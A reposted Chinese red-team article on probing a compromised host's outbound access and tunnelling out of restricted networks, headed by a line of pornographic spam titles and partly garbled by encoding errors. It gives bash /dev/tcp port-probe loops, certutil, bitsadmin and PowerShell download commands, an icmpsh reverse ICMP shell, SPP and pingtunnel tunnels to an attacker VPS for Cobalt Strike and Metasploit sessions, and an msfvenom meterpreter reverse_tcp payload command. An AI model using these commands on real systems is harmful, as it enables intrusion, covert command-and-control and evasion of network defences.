精品国产人成在线_亚洲高清无码在线观看_国产在线视频国产永久2021_国产AV综合第一页一个的一区免费影院黑人_最近中文字幕MV高清在线视频

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

出網(wǎng)探測是什么

jf_vLt34KHi ? 來源:Tide安全團(tuán)隊(duì) ? 作者: komorebi ? 2022-10-20 14:26 ? 次閱讀

出網(wǎng)探測

出網(wǎng)探測就是要探測出網(wǎng)協(xié)議,出站ip和出站端口。查看是否禁止了出站ip或者禁止了出站端口或者禁止了出站協(xié)議。

目標(biāo)禁止出站ip

如果目標(biāo)主機(jī)設(shè)置了嚴(yán)格的策略,防火墻只允許目標(biāo)內(nèi)網(wǎng)機(jī)器主動連接公網(wǎng)指定的ip。這樣的話,沒法反彈shell。(因?yàn)榘酌麊蝘p沒有辦法拿到權(quán)限)。

禁止出站端口

Linux系統(tǒng)使用Linux系統(tǒng)自帶命令探測出網(wǎng)端口。( 探測目標(biāo)機(jī)器可以訪問baidu.com對應(yīng)ip的端口)

foriin{440..449};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i***********************open************************"||echo"$iclosed";done
8e2b74f4-4f8f-11ed-a3b6-dac502259ad0.png

webshell不好回顯結(jié)果,將結(jié)果寫入文件中

foriin{440..449};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done>>result.txt
8e4e41b4-4f8f-11ed-a3b6-dac502259ad0.png

探測常見端口

foriin{21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,3389,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done
foriin{21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,3389,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done>>result.txt

攻擊端的端口請求記錄

從目標(biāo)發(fā)起的端口訪問請求,攻擊端必須得配合記錄,否則即便找到有效的出站端口,我們也無法獲悉。思路一,單個逐次監(jiān)聽端口。對于少量端口的探測,攻擊端很容易記錄。比如,要驗(yàn)證 windows 目標(biāo)的 8088 端口是否為出站端口,先在攻擊端用 nc -n -v -lp 8088 監(jiān)聽 8088,指定 -v 選項(xiàng)觀察實(shí)時訪問記錄,再在目標(biāo)上用 telnet 192.168.56.8 8088 連接攻擊端的 8088 端口,最后在攻擊端查看端口訪問記錄,若有則該端口是有效出站端口,若無則重復(fù)以上步驟繼續(xù)驗(yàn)證其他端口。

二,批量捆綁監(jiān)聽端口。試想一下,如果能夠把攻擊端的多個端口流量轉(zhuǎn)發(fā)至單個匯聚端口,就只需監(jiān)聽單個匯聚端口,目標(biāo)上發(fā)起多個端口探測,只要在攻擊端轉(zhuǎn)發(fā)的多個端口的范圍內(nèi),那么,一旦找到有效出站端口,攻擊端的匯聚端口一定有訪問記錄。說到端口轉(zhuǎn)發(fā),系統(tǒng)自帶的 ssh、iptables,三方的 frp、nps,這些工具都能高效實(shí)現(xiàn),于是,我從這四個工具中找尋具備端口捆綁能力的那位 攻擊端這邊需要有?標(biāo)機(jī)訪問的記錄,才能更好的判斷?標(biāo)機(jī)器是否訪問了我們。只要?標(biāo)機(jī)器訪問到 了我們VPS的任意?個端?,我們這邊都能有記錄。//將所有端?的流量都綁定到34444端?

iptables-APREROUTING-tnat-ptcp--dport1:65535-jREDIRECT--to-port34444

//查看nat表的規(guī)則

iptables-tnat-nvL

//清除nat表所有規(guī)則

iptables-tnat-F

//備份iptables規(guī)則

iptables-save>/tmp/firewall.rules

//恢復(fù)iptables規(guī)則

iptables-restore

配置防?墻規(guī)則,禁?訪問遠(yuǎn)程機(jī)器的1-34566和34566-65535端?,也就是說只允許訪問34567端?然后我們這邊監(jiān)聽34444端?,在?標(biāo)機(jī)器端?探測

8ea18c5c-4f8f-11ed-a3b6-dac502259ad0.png

禁止出站協(xié)議

對于禁止出站協(xié)議的情況,需要探測目標(biāo)機(jī)器允許哪些協(xié)議出網(wǎng)。

探測ICMP協(xié)議服務(wù)端

監(jiān)聽ICMP流量:

tcpdumpicmp

客戶端ping VPS地址,查看服務(wù)端能否收到請求VPS監(jiān)聽,然后ping我們vps查看能否收到監(jiān)聽來判斷ICMP 協(xié)議是否出?。也可以直接ping?個地址,看是否 有ttl值。

探測DNS協(xié)議

Windows:

nslookup、ping

Linux:

nslookup、dig、ping

通過判斷能否將域名解析為ip,判斷DNS協(xié)議是否出?。也可以將域名換成dnslog的域名,再看dnslog能否收到請求。

探測HTTP協(xié)議

Linux:可以使用curl命令

curlhttp://192.168.10.13

Windows系統(tǒng)可以使用如下的命令

certutil-urlcache-split-fhttp://www.baidu.com
bitsadmin/transfertesthttp://192.168.10.13/1c:1
powershelliwr-Urihttp://www.baidu.com-OutFile1-UseBasicParsing

只有ICMP協(xié)議出網(wǎng)

目標(biāo)只有icmp協(xié)議能出?的話,則只有考慮使?icmp協(xié)議來搭建隧道。利?icmp協(xié)議通信的?具有很多icmpsh、reverse-icmp-shell、PingTunnel、IcmpTunnel都可以。常?的ping命令就是利?的ICMP協(xié)議。

icmpsh(2016+kali2017)

icmpsh 是一個簡單的反向 ICMP shell,帶有一個 win32 從站和一個 C、Perl 或 Python 中的兼容主站。與其他類似的開源工具相比,它的主要優(yōu)勢在于它不需要管理權(quán)限即可在目標(biāo)機(jī)器上運(yùn)行。使用ICMP進(jìn)行命令控制(Icmpsh)適?場景:?標(biāo)機(jī)器是Windows服務(wù)器 Linux服務(wù)器執(zhí)行

#關(guān)閉icmp回復(fù),如果要開啟icmp回復(fù),該值設(shè)置為0
sysctl-wnet.ipv4.icmp_echo_ignore_all=1
#運(yùn)?,第?個IP是VPS的eth0?卡IP(vps上ifconfig可以得到),第?個IP是?標(biāo)機(jī)器出?的公?IP
python2icmpsh_m.py192.168.10.8192.168.10.7

目標(biāo)機(jī)器的操作:

icmpsh.exe-t192.168.10.8
8eafaabc-4f8f-11ed-a3b6-dac502259ad0.png

可以看到已經(jīng)反彈出一個shell

ICMP上線CS

有如下場景,我們拿到了內(nèi)?的機(jī)器權(quán)限。但是機(jī)器對外均只有icmp協(xié)議出網(wǎng),我們現(xiàn)在可以利?icmp封裝tcp協(xié)議,讓其上線cs。

使用SPP

平常演練常用的一些隧道工具像frp,nps在目標(biāo)出網(wǎng)的情況下還是比較好用的。但是一旦遇到一些比較惡劣的環(huán)境,比如只有icmp可以出網(wǎng)的情況,那就需要使用其他的工具像pingtunnel,ptunnel等。SPP三個特點(diǎn):、 支持icmp、kcp、quic 支持雙向的代理 可以自由進(jìn)行內(nèi)部外協(xié)議的組合

功能:支持的協(xié)議:tcp、udp、rudp(可靠udp)、ricmp(可靠icmp)、rhttp(可靠http)、kcp、quic 支持的類型:正向代理、反向代理、socks5正向代理、socks5反向代理 協(xié)議和類型可以自由組合 外部代理協(xié)議和內(nèi)部轉(zhuǎn)發(fā)協(xié)議可以自由組合 支持shadowsock/s插件,spp-shadowsock/s-plugin,spp-shadowsock/s-plugin-android cs服務(wù)器端

./spp-typeserver-protoricmp-listen0.0.0.0

客戶端

spp-name"test"-typeproxy_client-server140.143.167.58-fromaddr:8082-toaddr:8081-proxyprototcp-protoricmp
8ee3edcc-4f8f-11ed-a3b6-dac502259ad0.png

pingtunnel上線MSF&CS

1、pingtunnel下載鏈接

https://github.com/esrrhs/pingtunnel/releases

注意,在客戶端中運(yùn)行一定要加noprint nolog兩個參數(shù),否則會生成大量的日志文件;ICMP為網(wǎng)絡(luò)層協(xié)議,應(yīng)用層防火墻無法識別,且請求包當(dāng)中的數(shù)據(jù)字段被加密 2 vps服務(wù)端開啟

##開啟服務(wù)器模式
./pingtunnel-typeserver

3、客戶端開啟上傳客戶端

##客戶端本地監(jiān)聽9999端口,將監(jiān)聽到的連接通過icmpserver發(fā)送到Linsten_ip:7777端口
pingtunnel.exe-typeclient-l127.0.0.1:9999-sicmpserver_ip-t82.157.64.237:7778-tcp1-noprint1-nolog1

4、MSF上線

msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=127.0.0.1LPORT=9999-fexe-oAAA.exe

5、cs上線 建立監(jiān)聽127.0.0.1:9999和192.168.3.76:7777 對127的監(jiān)聽生成木馬AAA.exe,傳到靶機(jī)運(yùn)行

pingtunnel.exe-typeclient-l127.0.0.1:9999-s192.168.3.76-t192.168.3.76:7777-tcp1-noprint1-nolog1

審核編輯:湯梓紅

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • Linux
    +關(guān)注

    關(guān)注

    87

    文章

    11230

    瀏覽量

    208931
  • WINDOWS
    +關(guān)注

    關(guān)注

    3

    文章

    3524

    瀏覽量

    88433
  • 端口
    +關(guān)注

    關(guān)注

    4

    文章

    955

    瀏覽量

    32015

原文標(biāo)題:隧道與端口轉(zhuǎn)發(fā)

文章出處:【微信號:Tide安全團(tuán)隊(duì),微信公眾號:Tide安全團(tuán)隊(duì)】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    被動聲探測網(wǎng)數(shù)據(jù)仿真系統(tǒng)的設(shè)計與實(shí)現(xiàn)

    被動聲探測網(wǎng)數(shù)據(jù)仿真系統(tǒng)的設(shè)計與實(shí)現(xiàn)摘要以被動聲探測網(wǎng)數(shù)據(jù)融合仿真測試評估系統(tǒng)的研究和開發(fā)為背景,討論了被動聲探測
    發(fā)表于 08-08 09:35

    電纜探測

    時會出現(xiàn)內(nèi)部斷線外部完好,沒有儀器情況下是找不到斷線位置。我們研制《電纜斷線探測器》可探測各種大小型多芯低壓電纜, 地埋電纜。檢測位置準(zhǔn)確,隔皮檢測,不損壞電纜。精度10毫米。備有樣品,以供觀看。如果需要請聯(lián)系。地址:河南省孟
    發(fā)表于 05-06 18:32

    地下金屬探測

    本帖最后由 eehome 于 2013-1-5 09:49 編輯 大俠們,誰有這方面的資料可以共享下,想研究一個能探測地下金屬的東西電子產(chǎn)品玩玩,我自己本身是做硬件電子開發(fā)的,不過不涉及這塊,大俠們,有資料記得分享下萬分感謝{:soso_e100:}
    發(fā)表于 10-24 15:20

    簡易照明線路探測

    設(shè)計 并制作 具有顯示器的 簡易 照明線路探測儀 ,能在厚度為 5mm 的五合板 正面探測 背面 2根照明 電纜 的位置, 電纜 的布線 如圖 1所示 。電纜一 端與 220V 交流電源插座相連
    發(fā)表于 09-04 09:34

    光子探測

    最高分辨率記錄弱信號時,無噪聲檢測器便顯示其最大的優(yōu)勢。2、優(yōu)異的點(diǎn)擴(kuò)散函數(shù)采用混合像素技術(shù)和X射線直接轉(zhuǎn)換為電荷脈沖技術(shù),PILATUS探測器的像素之間沒有信號傳播。這給于單個像素形成尖銳的點(diǎn)擴(kuò)散函數(shù)
    發(fā)表于 03-03 19:12

    capture cis 網(wǎng)表沒有反應(yīng)

    昨天用capture cis 網(wǎng)表時,怎么不出來,總是提示下面的警告,然后就沒反應(yīng)了,檢查之后沒發(fā)現(xiàn)什么異常,最后搜素“.dsnwill be saved prior
    發(fā)表于 09-27 17:11

    電流探測

    示波器一般為輸入電壓而設(shè)計,但可運(yùn)用電流探測線使示波器能測量電流.電流探測線有一對夾子,使探測線能圍繞被測電流流過的電路。當(dāng)用電流探測線測量電流時,無需有電的連接,也無需切開電路。電流
    發(fā)表于 10-30 10:40

    超低空分布式多傳感器探測節(jié)點(diǎn)有什么優(yōu)點(diǎn)?

    由于雷達(dá)探測存在盲區(qū),低空與超低空飛行的入侵目標(biāo)給雷達(dá)防御系統(tǒng)帶來困難與威脅。基于GPS技術(shù)、多傳感器技術(shù)、網(wǎng)絡(luò)技術(shù)及單片機(jī)技術(shù)設(shè)計一種分布式多傳感器探測節(jié)點(diǎn),把遠(yuǎn)程分布的多傳感器探測
    發(fā)表于 04-14 07:50

    調(diào)試網(wǎng)絡(luò),是否可以使用以太網(wǎng)或UART在外部探測這些網(wǎng)絡(luò)?

    嗨專家,我想在我的設(shè)計中調(diào)試一些網(wǎng)。是否可以使用以太網(wǎng)或UART在外部探測這些網(wǎng)絡(luò)。如果可能的話,你可以提供一些教程鏈接或一些可以讓我實(shí)現(xiàn)它的文檔。您的建議和指導(dǎo)將非常有幫助。謝謝
    發(fā)表于 05-21 07:35

    被動聲探測網(wǎng)數(shù)據(jù)仿真系統(tǒng)的設(shè)計與實(shí)現(xiàn)

    被動聲探測網(wǎng)數(shù)據(jù)仿真系統(tǒng)的設(shè)計與實(shí)現(xiàn) 以被動聲探測網(wǎng)數(shù)據(jù)融合仿真測試評估系統(tǒng)的研究和開發(fā)為背景,討論了被動聲探測
    發(fā)表于 02-23 09:45 ?7次下載

    基于方位測量的地下管線探測系統(tǒng)設(shè)計與研究

    隨著現(xiàn)代信息化技術(shù)的發(fā)展,在當(dāng)前的地下管線探測工作中,亟待應(yīng)用信息化手段設(shè)計地下管線探測系統(tǒng),實(shí)現(xiàn)對地下管線探測工作的信息化管理;對此本篇基于方位測量技術(shù),從系統(tǒng)需求分析、系統(tǒng)結(jié)構(gòu)、
    發(fā)表于 11-23 15:34 ?2次下載
    基于方位測量的地下管線<b class='flag-5'>探測</b>系統(tǒng)設(shè)計與研究

    天問一號探測器多重

    作為本輪火星探測競賽第二位場的選手,總重約5噸的“天問一號”作為世界領(lǐng)先探測器之一
    的頭像 發(fā)表于 07-23 14:50 ?1.4w次閱讀

    各種協(xié)議判斷主機(jī)是否網(wǎng)

    允許哪些協(xié)議網(wǎng),執(zhí)行命令時可結(jié)合Wireshark工具來查看它走的什么協(xié)議。這篇文章的內(nèi)容基本摘自@Keefe 老哥博客中的 各種協(xié)議判斷目標(biāo)是否網(wǎng) 。 (1) ICMPping
    的頭像 發(fā)表于 10-16 14:19 ?3999次閱讀
    各種協(xié)議判斷主機(jī)是否<b class='flag-5'>出</b><b class='flag-5'>網(wǎng)</b>

    如何設(shè)計穩(wěn)定的以太網(wǎng)?留意這幾個設(shè)計要點(diǎn)!

    以太網(wǎng)是大部分嵌入式產(chǎn)品必備的通信接口,如何設(shè)計穩(wěn)定、可靠的以太網(wǎng)電路呢?本文綜合數(shù)名行業(yè)硬件工程師經(jīng)驗(yàn)總結(jié)以下要點(diǎn),希望能為讀者提供設(shè)計思路及解決問題的方法。
    的頭像 發(fā)表于 04-08 15:47 ?756次閱讀
    如何設(shè)計<b class='flag-5'>出</b>穩(wěn)定的以太<b class='flag-5'>網(wǎng)</b>?留意這幾個設(shè)計要點(diǎn)!

    科學(xué)家研制一款新型柔性X射線探測

    英國科學(xué)家開發(fā)出一種有機(jī)半導(dǎo)體材料,并利用其研制一款新型柔性X射線探測器。這種探測器不僅“身段”更柔軟,可貼合需要掃描物體的形狀,從而提高患者篩查的準(zhǔn)確性,降低腫瘤成像和放射性治療的風(fēng)險,而且成本
    的頭像 發(fā)表于 06-13 06:29 ?258次閱讀